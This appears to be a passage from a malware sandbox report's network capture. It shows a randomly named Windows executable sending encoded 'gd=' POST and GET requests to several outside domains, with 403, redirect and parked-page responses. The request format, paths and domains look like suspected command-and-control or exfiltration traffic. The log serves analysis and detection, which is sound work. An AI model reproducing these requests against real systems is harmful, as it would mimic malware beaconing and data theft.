                  Sep 14, 2024 11:11:59.008897066 CEST810OUTPOST /yl6y/ HTTP/1.1
                  Host: www.independent200.org
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                  Accept-Encoding: gzip, deflate, br
                  Accept-Language: en-US
                  Connection: close
                  Content-Length: 219
                  Content-Type: application/x-www-form-urlencoded
                  Cache-Control: no-cache
                  Origin: http://www.independent200.org
                  Referer: http://www.independent200.org/yl6y/
                  User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                  Data Raw: 67 64 3d 64 4e 69 4c 61 73 46 48 56 73 63 34 37 65 4b 4e 4a 42 61 66 44 2f 78 65 61 62 72 45 48 63 41 4e 76 30 31 39 6b 39 53 54 39 76 7a 33 5a 6f 2f 68 53 63 52 43 64 73 31 33 5a 75 44 4c 45 78 53 70 64 65 77 68 65 5a 4d 4e 48 6e 42 39 76 71 6e 30 4a 65 39 42 53 53 56 54 50 50 54 2b 59 79 55 75 65 56 39 6f 56 32 58 6c 51 50 73 73 70 4f 6b 47 43 50 72 44 5a 54 56 4a 54 43 58 58 62 31 43 67 67 77 72 39 61 65 39 6e 6f 53 4a 4c 57 53 30 61 78 36 49 4b 32 77 49 45 53 4a 58 4e 41 6a 62 69 63 62 38 64 77 2f 68 44 6c 54 48 36 4d 45 54 46 42 41 2b 4f 63 52 32 2b 6a 4a 31 4a 4f 51 53 64 6d 45 79 59 4e 74 5a 41 2f 39 59 58 53 46 63 38 76 6e 49 74 49 61 77 3d
                  Data Ascii: gd=dNiLasFHVsc47eKNJBafD/xeabrEHcANv019k9ST9vz3Zo/hScRCds13ZuDLExSpdewheZMNHnB9vqn0Je9BSSVTPPT+YyUueV9oV2XlQPsspOkGCPrDZTVJTCXXb1Cggwr9ae9noSJLWS0ax6IK2wIESJXNAjbicb8dw/hDlTH6METFBA+OcR2+jJ1JOQSdmEyYNtZA/9YXSFc8vnItIaw=
                  Sep 14, 2024 11:11:59.884313107 CEST154INHTTP/1.1 403 Forbidden
                  Content-Type: text/plain; charset=utf-8
                  Date: Sat, 14 Sep 2024 09:11:59 GMT
                  Content-Length: 11
                  Connection: close
                  Data Raw: 42 61 64 20 52 65 71 75 65 73 74
                  Data Ascii: Bad Request


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  11192.168.2.449748103.42.108.46803272C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exe
                  TimestampBytes transferredDirectionData
                  Sep 14, 2024 11:12:01.554862022 CEST10892OUTPOST /yl6y/ HTTP/1.1
                  Host: www.independent200.org
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                  Accept-Encoding: gzip, deflate, br
                  Accept-Language: en-US
                  Connection: close
                  Content-Length: 10299
                  Content-Type: application/x-www-form-urlencoded
                  Cache-Control: no-cache
                  Origin: http://www.independent200.org
                  Referer: http://www.independent200.org/yl6y/
                  User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                  Data Raw: 67 64 3d 64 4e 69 4c 61 73 46 48 56 73 63 34 37 65 4b 4e 4a 42 61 66 44 2f 78 65 61 62 72 45 48 63 41 4e 76 30 31 39 6b 39 53 54 39 76 72 33 59 61 33 68 51 2f 4a 43 63 73 31 33 48 2b 44 49 45 78 53 52 64 66 59 6c 65 5a 51 37 48 68 46 39 75 49 66 30 50 71 70 42 4c 69 56 54 58 50 54 7a 48 69 55 37 65 55 4e 57 56 32 48 6c 51 50 73 73 70 49 67 47 46 62 66 44 56 7a 56 4b 45 79 58 6c 51 56 43 59 67 30 2b 4b 61 65 70 64 6f 69 70 4c 57 32 55 61 2b 70 67 4b 72 41 49 38 56 4a 58 56 41 69 6e 48 63 62 77 6e 77 2f 46 6c 6c 56 37 36 4d 44 6d 66 46 6b 6e 54 64 51 4b 50 2b 4c 51 70 4f 44 37 66 67 31 36 58 63 64 74 6a 6a 4d 64 36 51 56 52 73 33 6e 59 75 4d 66 61 2f 74 68 35 53 45 48 52 41 61 50 34 4c 73 4a 4f 56 56 71 57 44 74 51 30 57 67 69 77 4e 50 7a 65 63 34 43 6b 56 6a 6a 41 6d 32 64 4b 48 68 69 7a 33 49 4d 41 57 33 39 56 4d 36 6e 53 44 77 32 32 55 73 6b 7a 4b 4e 4a 31 38 4c 39 74 6e 31 58 41 4c 4d 4a 39 56 36 30 61 50 38 30 32 77 45 61 45 59 4b 55 6d 6b 45 49 47 6a 6b 70 49 38 79 52 34 38 59 6c 4c 6f 43 33 56 [TRUNCATED]
                  Data Ascii: gd=dNiLasFHVsc47eKNJBafD/xeabrEHcANv019k9ST9vr3Ya3hQ/JCcs13H+DIExSRdfYleZQ7HhF9uIf0PqpBLiVTXPTzHiU7eUNWV2HlQPsspIgGFbfDVzVKEyXlQVCYg0+KaepdoipLW2Ua+pgKrAI8VJXVAinHcbwnw/FllV76MDmfFknTdQKP+LQpOD7fg16XcdtjjMd6QVRs3nYuMfa/th5SEHRAaP4LsJOVVqWDtQ0WgiwNPzec4CkVjjAm2dKHhiz3IMAW39VM6nSDw22UskzKNJ18L9tn1XALMJ9V60aP802wEaEYKUmkEIGjkpI8yR48YlLoC3V/zw7fHfuXRO3HlzjzdoTP0BHseBRR7A470gHp9rIWlsY0oVL1ie7ahetkuTu2tb+Zi6bYbyef6OPqn0kfTUza+Ffiq70A/flBio+YhwS23iRRRj73OW6ft4RoRdTMqdtqLvhMBbs+JLv47tNnWW3bdWqp323NQ9J6moLc3UFP8PCXPAgJaAkJX7zMIaOZ/EC7ToyWQ5zPeI7O6Mgcj/MY/7qbCUG19Ri76G3kgT1jkBkf0qM/YhouURqbphXF07p5a6UvvPCae5EVssQ7/itf/xAe4+gLErxWNywpJcNvfu0GXP5+feXloNhUY9xHHoUTu+NK3OsyADYDn6JayIZrFSDXZrtoS+XbfOBGn2HB2FFl0Tsw2kahXqEZ5q+77iL64cHn5xKpJS8HRmzkNG9YN8pSGAdYQRj4y/ym1NxsPRekuXT0FPcbvafHX7+Hotp/iKO1m3B/B1bucezvkBqkAdMB0sgzelbwA+ePUsQxemd+n7DyJlYlxH4JzcLL55OCqzLTX9aVcytKQMpQhlzLPRgZRTN/auQjTdxKrHQDaEcIohbyZCmRSrn6hI+xXxE5aVQnn0m89nDS4fIFZISYnqBRelS6eGOzHsSOSu7ladkzH5+qMwvUtPvwyrvoOL14tVLYfOwcpD1S3a4c4I66LGvw5p0UaJJNE [TRUNCATED]


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  12192.168.2.449749103.42.108.46803272C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exe
                  TimestampBytes transferredDirectionData
                  Sep 14, 2024 11:12:04.097100973 CEST516OUTGET /yl6y/?gd=QPKrZbNCTa4h9OiZDCqTEYRHVYq8I9pQgXRm4OHk1vP2UInoYMEgLbhzG96tdyW5WcZsMbYjLnFg+NDONb5+DVpCe+n8LSxyZkRiMUCXQdQdgo9ddvaEU2A=&a0=_6Edzvj0xtFLdH HTTP/1.1
                  Host: www.independent200.org
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                  Accept-Language: en-US
                  Connection: close
                  User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                  Sep 14, 2024 11:12:04.990652084 CEST154INHTTP/1.1 403 Forbidden
                  Content-Type: text/plain; charset=utf-8
                  Date: Sat, 14 Sep 2024 09:12:04 GMT
                  Content-Length: 11
                  Connection: close
                  Data Raw: 42 61 64 20 52 65 71 75 65 73 74
                  Data Ascii: Bad Request


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  13192.168.2.4497503.33.130.190803272C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exe
                  TimestampBytes transferredDirectionData
                  Sep 14, 2024 11:12:10.665671110 CEST787OUTPOST /06rp/ HTTP/1.1
                  Host: www.tigre777gg.online
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                  Accept-Encoding: gzip, deflate, br
                  Accept-Language: en-US
                  Connection: close
                  Content-Length: 199
                  Content-Type: application/x-www-form-urlencoded
                  Cache-Control: no-cache
                  Origin: http://www.tigre777gg.online
                  Referer: http://www.tigre777gg.online/06rp/
                  User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                  Data Raw: 67 64 3d 2b 67 78 39 6f 34 79 6c 49 59 47 4c 2b 76 35 67 56 72 6c 4e 6b 34 6b 67 42 49 39 62 79 75 53 76 46 61 46 6c 61 6c 76 6c 46 78 76 44 52 7a 54 52 5a 4b 42 69 31 69 2f 37 43 4c 6e 63 57 67 59 7a 4c 65 47 43 5a 43 7a 32 41 6d 64 6b 6a 6e 66 48 50 74 69 4e 55 55 51 31 2f 42 66 6a 6a 65 6e 4c 53 6e 66 4b 4d 55 4e 62 38 76 47 41 58 63 38 54 35 37 4a 64 36 33 54 41 44 53 31 2f 57 39 6d 56 37 6d 6d 76 64 4e 38 53 76 30 73 2b 68 75 44 66 67 44 6d 66 68 6d 6e 55 42 35 35 65 64 62 52 38 77 52 63 34 46 59 34 4a 65 36 39 4b 77 6e 49 4a 64 50 4a 7a 77 38 47 4b 66 4f 52 72 65 77 4c 4c 79 51 3d 3d
                  Data Ascii: gd=+gx9o4ylIYGL+v5gVrlNk4kgBI9byuSvFaFlalvlFxvDRzTRZKBi1i/7CLncWgYzLeGCZCz2AmdkjnfHPtiNUUQ1/BfjjenLSnfKMUNb8vGAXc8T57Jd63TADS1/W9mV7mmvdN8Sv0s+huDfgDmfhmnUB55edbR8wRc4FY4Je69KwnIJdPJzw8GKfORrewLLyQ==


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  14192.168.2.4497513.33.130.190803272C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exe
                  TimestampBytes transferredDirectionData
                  Sep 14, 2024 11:12:13.210875988 CEST807OUTPOST /06rp/ HTTP/1.1
                  Host: www.tigre777gg.online
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                  Accept-Encoding: gzip, deflate, br
                  Accept-Language: en-US
                  Connection: close
                  Content-Length: 219
                  Content-Type: application/x-www-form-urlencoded
                  Cache-Control: no-cache
                  Origin: http://www.tigre777gg.online
                  Referer: http://www.tigre777gg.online/06rp/
                  User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                  Data Raw: 67 64 3d 2b 67 78 39 6f 34 79 6c 49 59 47 4c 2b 4d 68 67 5a 71 6c 4e 68 59 6b 68 64 59 39 62 38 4f 54 6d 46 61 42 6c 61 6e 44 4c 45 44 4c 44 51 52 37 52 59 4c 42 69 35 43 2f 37 61 62 6e 64 62 41 59 34 4c 65 61 67 5a 44 2f 32 41 6d 68 6b 6a 6a 58 48 50 61 32 4f 55 45 51 33 71 52 66 68 38 4f 6e 4c 53 6e 66 4b 4d 55 70 78 38 76 4f 41 58 4e 4d 54 37 5a 68 61 6b 6e 54 44 58 43 31 2f 53 39 6d 5a 37 6d 6e 34 64 50 59 38 76 77 63 2b 68 73 4c 66 68 57 4b 59 30 57 6e 61 50 5a 34 41 64 4c 35 77 34 78 42 77 44 62 30 64 42 70 35 61 38 42 5a 54 4d 2b 6f 6b 69 38 69 35 43 4a 59 66 54 7a 32 43 70 52 44 6c 4f 4f 6d 49 75 35 6d 6d 33 30 6b 73 52 62 62 57 6a 56 38 3d
                  Data Ascii: gd=+gx9o4ylIYGL+MhgZqlNhYkhdY9b8OTmFaBlanDLEDLDQR7RYLBi5C/7abndbAY4LeagZD/2AmhkjjXHPa2OUEQ3qRfh8OnLSnfKMUpx8vOAXNMT7ZhaknTDXC1/S9mZ7mn4dPY8vwc+hsLfhWKY0WnaPZ4AdL5w4xBwDb0dBp5a8BZTM+oki8i5CJYfTz2CpRDlOOmIu5mm30ksRbbWjV8=


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  15192.168.2.4497523.33.130.190803272C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exe
                  TimestampBytes transferredDirectionData
                  Sep 14, 2024 11:12:15.766053915 CEST10889OUTPOST /06rp/ HTTP/1.1
                  Host: www.tigre777gg.online
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                  Accept-Encoding: gzip, deflate, br
                  Accept-Language: en-US
                  Connection: close
                  Content-Length: 10299
                  Content-Type: application/x-www-form-urlencoded
                  Cache-Control: no-cache
                  Origin: http://www.tigre777gg.online
                  Referer: http://www.tigre777gg.online/06rp/
                  User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                  Data Raw: 67 64 3d 2b 67 78 39 6f 34 79 6c 49 59 47 4c 2b 4d 68 67 5a 71 6c 4e 68 59 6b 68 64 59 39 62 38 4f 54 6d 46 61 42 6c 61 6e 44 4c 45 44 44 44 51 69 44 52 5a 73 39 69 34 43 2f 37 54 37 6e 59 62 41 59 6c 4c 65 53 6b 5a 44 6a 6d 41 6a 74 6b 68 45 58 48 4a 6f 4f 4f 4e 30 51 33 6f 52 66 6b 6a 65 6d 52 53 6e 50 4f 4d 55 5a 78 38 76 4f 41 58 4f 55 54 79 72 4a 61 6d 6e 54 41 44 53 31 6a 57 39 6d 39 37 6d 66 6f 64 50 63 43 73 42 67 2b 69 50 6a 66 6d 67 2b 59 32 32 6e 50 4d 5a 34 49 64 4c 6b 75 34 78 74 57 44 59 6f 33 42 75 78 61 76 6c 55 76 5a 38 6b 4e 78 64 4f 62 59 34 35 39 53 67 43 43 69 69 58 6a 65 2f 2b 6a 34 49 65 50 2f 54 64 34 4e 36 4b 56 38 69 66 45 61 34 59 32 44 35 4e 30 68 62 59 70 73 65 32 4f 39 43 41 66 5a 37 73 67 6b 66 46 45 4f 6f 78 73 48 71 65 77 4a 45 4d 53 78 59 6a 64 47 39 79 77 71 50 5a 45 72 41 39 39 41 41 64 69 4e 34 6b 4b 48 45 59 4a 6a 4d 76 5a 41 36 65 6d 42 31 5a 70 51 39 36 47 78 43 70 64 64 72 52 45 6d 4d 53 61 6e 31 71 71 51 41 59 33 35 4c 4d 37 31 6a 33 57 55 64 6a 55 6e 4e 35 [TRUNCATED]
                  Data Ascii: gd=+gx9o4ylIYGL+MhgZqlNhYkhdY9b8OTmFaBlanDLEDDDQiDRZs9i4C/7T7nYbAYlLeSkZDjmAjtkhEXHJoOON0Q3oRfkjemRSnPOMUZx8vOAXOUTyrJamnTADS1jW9m97mfodPcCsBg+iPjfmg+Y22nPMZ4IdLku4xtWDYo3BuxavlUvZ8kNxdObY459SgCCiiXje/+j4IeP/Td4N6KV8ifEa4Y2D5N0hbYpse2O9CAfZ7sgkfFEOoxsHqewJEMSxYjdG9ywqPZErA99AAdiN4kKHEYJjMvZA6emB1ZpQ96GxCpddrREmMSan1qqQAY35LM71j3WUdjUnN5JZbTjywWRSxjeix2Sp7ockLH94iOVcnPxjUF4lEEGzAn/yJcWGb5Wix10fVQpTKmBpZy8unv/+TVZDZBbiKthMIBn+rAIWHLynRNG98oo7jQZFiHS2jCxtvtbMDxW9if+9wpLBZim9PhBMja2y31trVTqdNjQMIgVXCc5DqHBBfZau5VWBQvKwQQPXWCqsKPd3JiZPfR1ji004bojAb3elcFnP4OzE7iZJGrGcaPVrLMPBCUUT5zH6zhZ5c57wZ0hPrBGjhBplY9T9hgFY4p+eXa8bygwoghXwq4sXPc7X9hR8iCUUv+zQE2lpskXd0/t11Dz5a5qjmVnbj2V1PFOoBtIxYZDc638nTHGFiB2baJ5gbeF+67Lhn6W5ksGfUP/I4Dd4Y54+o1qS4jv6Bc4Nobkm21etG81cZ+Ut62FBvuxJE/Jie8vlp35BtHGZzJLtoE8gEMmw+aEEtpsgBvIoIR7L6odMLeC02i62jhGxkS+VyN7S0kHJQ1uH/iZM45w7eeHhTGayCsAJcD384pbjKFNsX/bCYblFuJIct7WBdsDfGja9A6K0yntl6Y9/1g8B/S6cRZlmf3lxb/l13cOhL7RT33NgbgpNxBXLS2AlUIS2qdUHZ+Mgj6YCy813cTa7uZmej4ZaWhOKSOAHVdTQ+cpnkcmkZF3V [TRUNCATED]


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  16192.168.2.4497533.33.130.190803272C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exe
                  TimestampBytes transferredDirectionData
                  Sep 14, 2024 11:12:18.305566072 CEST515OUTGET /06rp/?gd=ziZdrN3wZJ2qpMxAfrlPkqpeB+M36+P6AeZYAnfnCDTQdjjRY74IsSepDIbPZx0tCufpSRr3CAxW0yXnKoSYcz8nolH3weaQT2LRQ2gsiM78APZpluIu/QY=&a0=_6Edzvj0xtFLdH HTTP/1.1
                  Host: www.tigre777gg.online
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                  Accept-Language: en-US
                  Connection: close
                  User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                  Sep 14, 2024 11:12:18.771275997 CEST396INHTTP/1.1 200 OK
                  Server: openresty
                  Date: Sat, 14 Sep 2024 09:12:18 GMT
                  Content-Type: text/html
                  Content-Length: 256
                  Connection: close
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 67 64 3d 7a 69 5a 64 72 4e 33 77 5a 4a 32 71 70 4d 78 41 66 72 6c 50 6b 71 70 65 42 2b 4d 33 36 2b 50 36 41 65 5a 59 41 6e 66 6e 43 44 54 51 64 6a 6a 52 59 37 34 49 73 53 65 70 44 49 62 50 5a 78 30 74 43 75 66 70 53 52 72 33 43 41 78 57 30 79 58 6e 4b 6f 53 59 63 7a 38 6e 6f 6c 48 33 77 65 61 51 54 32 4c 52 51 32 67 73 69 4d 37 38 41 50 5a 70 6c 75 49 75 2f 51 59 3d 26 61 30 3d 5f 36 45 64 7a 76 6a 30 78 74 46 4c 64 48 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?gd=ziZdrN3wZJ2qpMxAfrlPkqpeB+M36+P6AeZYAnfnCDTQdjjRY74IsSepDIbPZx0tCufpSRr3CAxW0yXnKoSYcz8nolH3weaQT2LRQ2gsiM78APZpluIu/QY=&a0=_6Edzvj0xtFLdH"}</script></head></html>


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  17192.168.2.449754199.59.243.226803272C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exe
                  TimestampBytes transferredDirectionData
                  Sep 14, 2024 11:12:32.041430950 CEST802OUTPOST /wwak/ HTTP/1.1
                  Host: www.personal-loans-jp8.xyz
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                  Accept-Encoding: gzip, deflate, br
                  Accept-Language: en-US
                  Connection: close
                  Content-Length: 199
                  Content-Type: application/x-www-form-urlencoded
                  Cache-Control: no-cache
                  Origin: http://www.personal-loans-jp8.xyz
                  Referer: http://www.personal-loans-jp8.xyz/wwak/
                  User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                  Data Raw: 67 64 3d 4a 31 37 6d 71 31 56 73 79 41 52 4f 4e 66 61 44 42 62 37 4e 76 69 4b 7a 35 2f 4a 48 56 4e 46 51 69 62 76 6d 50 67 6e 57 32 44 74 4f 70 42 56 4d 4d 6c 6b 4e 6e 63 77 38 56 4f 31 79 33 63 42 4a 36 72 71 54 68 44 77 4f 30 50 4a 75 38 61 7a 65 46 41 46 31 52 6e 39 4b 4b 6e 42 41 53 33 31 49 71 51 4f 57 4f 5a 45 77 38 68 2b 30 73 39 37 43 56 59 62 59 48 42 33 4c 69 75 72 7a 36 43 47 36 72 65 6f 53 58 45 55 54 38 68 6f 2f 41 6c 41 4d 30 70 65 66 52 55 46 63 65 64 4b 51 71 48 73 6f 67 78 6a 50 6a 34 36 6d 7a 6c 6c 69 4c 44 36 56 65 6b 72 33 46 6c 6b 39 57 50 6c 6c 39 62 67 33 61 67 3d 3d
                  Data Ascii: gd=J17mq1VsyARONfaDBb7NviKz5/JHVNFQibvmPgnW2DtOpBVMMlkNncw8VO1y3cBJ6rqThDwO0PJu8azeFAF1Rn9KKnBAS31IqQOWOZEw8h+0s97CVYbYHB3Liurz6CG6reoSXEUT8ho/AlAM0pefRUFcedKQqHsogxjPj46mzlliLD6Vekr3Flk9WPll9bg3ag==
                  Sep 14, 2024 11:12:32.485328913 CEST1236INHTTP/1.1 200 OK
                  date: Sat, 14 Sep 2024 09:12:32 GMT
                  content-type: text/html; charset=utf-8
                  content-length: 1154
                  x-request-id: bb2eeeab-249a-437a-ad87-0b248c9b00aa
                  cache-control: no-store, max-age=0
                  accept-ch: sec-ch-prefers-color-scheme
                  critical-ch: sec-ch-prefers-color-scheme
                  vary: sec-ch-prefers-color-scheme
                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Y9CIEGl8IQC3sZZtJfUxnTEEj80M9/E/jZudzVpmwKU4r70oseltsDt2jU2oJPvlwT9g0qV2Is8J8BgfpbvynQ==
                  set-cookie: parking_session=bb2eeeab-249a-437a-ad87-0b248c9b00aa; expires=Sat, 14 Sep 2024 09:27:32 GMT; path=/
                  connection: close
                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 59 39 43 49 45 47 6c 38 49 51 43 33 73 5a 5a 74 4a 66 55 78 6e 54 45 45 6a 38 30 4d 39 2f 45 2f 6a 5a 75 64 7a 56 70 6d 77 4b 55 34 72 37 30 6f 73 65 6c 74 73 44 74 32 6a 55 32 6f 4a 50 76 6c 77 54 39 67 30 71 56 32 49 73 38 4a 38 42 67 66 70 62 76 79 6e 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                  Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Y9CIEGl8IQC3sZZtJfUxnTEEj80M9/E/jZudzVpmwKU4r70oseltsDt2jU2oJPvlwT9g0qV2Is8J8BgfpbvynQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                  Sep 14, 2024 11:12:32.486071110 CEST607INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                  Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYmIyZWVlYWItMjQ5YS00MzdhLWFkODctMGIyNDhjOWIwMGFhIiwicGFnZV90aW1lIjoxNzI2MzA1MT


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  18192.168.2.449755199.59.243.226803272C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exe
                  TimestampBytes transferredDirectionData
                  Sep 14, 2024 11:12:34.589665890 CEST822OUTPOST /wwak/ HTTP/1.1
                  Host: www.personal-loans-jp8.xyz
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                  Accept-Encoding: gzip, deflate, br
                  Accept-Language: en-US
                  Connection: close
                  Content-Length: 219
                  Content-Type: application/x-www-form-urlencoded
                  Cache-Control: no-cache
                  Origin: http://www.personal-loans-jp8.xyz
                  Referer: http://www.personal-loans-jp8.xyz/wwak/
                  User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                  Data Raw: 67 64 3d 4a 31 37 6d 71 31 56 73 79 41 52 4f 4e 2f 71 44 44 34 54 4e 70 43 4b 30 6b 50 4a 48 43 64 46 55 69 62 54 6d 50 68 53 54 33 78 35 4f 6f 6b 70 4d 65 52 49 4e 67 63 77 38 65 75 30 34 34 38 42 43 36 72 58 6d 68 42 30 4f 30 4f 70 75 38 62 44 65 46 33 78 32 51 33 39 55 48 48 41 47 57 33 31 49 71 51 4f 57 4f 64 70 72 38 6c 53 30 73 4e 4c 43 55 35 62 58 4a 68 33 49 6c 75 72 7a 2b 43 47 45 72 65 6f 38 58 41 30 39 38 69 51 2f 41 67 38 4d 30 59 65 63 59 55 46 67 61 64 4c 56 76 6b 56 42 68 53 65 35 70 65 32 66 39 6c 31 46 4b 46 72 50 50 56 4b 67 58 6c 41 4f 4c 49 73 52 77 59 64 2b 42 73 79 46 78 77 4a 68 33 57 6b 30 61 78 42 59 38 48 4c 41 52 52 45 3d
                  Data Ascii: gd=J17mq1VsyARON/qDD4TNpCK0kPJHCdFUibTmPhST3x5OokpMeRINgcw8eu0448BC6rXmhB0O0Opu8bDeF3x2Q39UHHAGW31IqQOWOdpr8lS0sNLCU5bXJh3Ilurz+CGEreo8XA098iQ/Ag8M0YecYUFgadLVvkVBhSe5pe2f9l1FKFrPPVKgXlAOLIsRwYd+BsyFxwJh3Wk0axBY8HLARRE=
                  Sep 14, 2024 11:12:35.042042017 CEST1236INHTTP/1.1 200 OK
                  date: Sat, 14 Sep 2024 09:12:34 GMT
                  content-type: text/html; charset=utf-8
                  content-length: 1154
                  x-request-id: 7b2e3516-2ff4-48b7-98a0-0e14c0bdab98
                  cache-control: no-store, max-age=0
                  accept-ch: sec-ch-prefers-color-scheme
                  critical-ch: sec-ch-prefers-color-scheme
